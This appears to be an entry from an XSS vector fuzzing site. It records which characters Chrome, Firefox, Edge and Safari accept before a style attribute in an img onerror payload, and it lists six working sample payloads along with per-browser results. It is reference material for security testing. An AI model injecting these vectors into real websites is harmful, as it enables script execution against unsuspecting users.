
Chars allowed before style attribute...

Results per browser:
Chrome: 6
Firefox: 6
Edge: 6
Safari: 6

This XSS vector shows what characters can be used before the onerror event.

Created by t0xodile
Created Oct 25, 2025
Updated Oct 25, 2025

Category: HTML Parsing
Visibility: Public
Type: XSS
Charset: UTF-8
Template used:
<img src onerror=log($[i])$[chr]style=display:block;content-visibility:auto>

Sample payloads

<img src onerror=alert(9)0x09style=display:block;content-visibility:auto>
<img src onerror=alert(10)
style=display:block;content-visibility:auto>
<img src onerror=alert(12)0x0Cstyle=display:block;content-visibility:auto>
<img src onerror=alert(13)0x0Dstyle=display:block;content-visibility:auto>
<img src onerror=alert(32) style=display:block;content-visibility:auto>
<img src onerror=alert(62)>style=display:block;content-visibility:auto>

Fuzz results

Chrome 144.0.0.0 desktop macOS 10.15.7
Updated Sun Jan 25 2026
Found 6 results

Chrome 139.0.0.0 desktop Linux Unknown (older version)
Updated Sat Oct 25 2025
Found 6 results

Firefox 147.0 desktop macOS 10.15
Updated Sun Jan 25 2026
Found 6 results

Microsoft Edge 144.0.0.0 desktop Windows NT 10.0
Updated Mon Jan 26 2026
Found 6 results

Safari 26.2 mobile iOS 18.7
Updated Thu Jan 29 2026
Found 6 results

Safari 17.2 mobile iOS 17.2.1 (older version)
Updated Thu Jan 29 2026
Found 6 results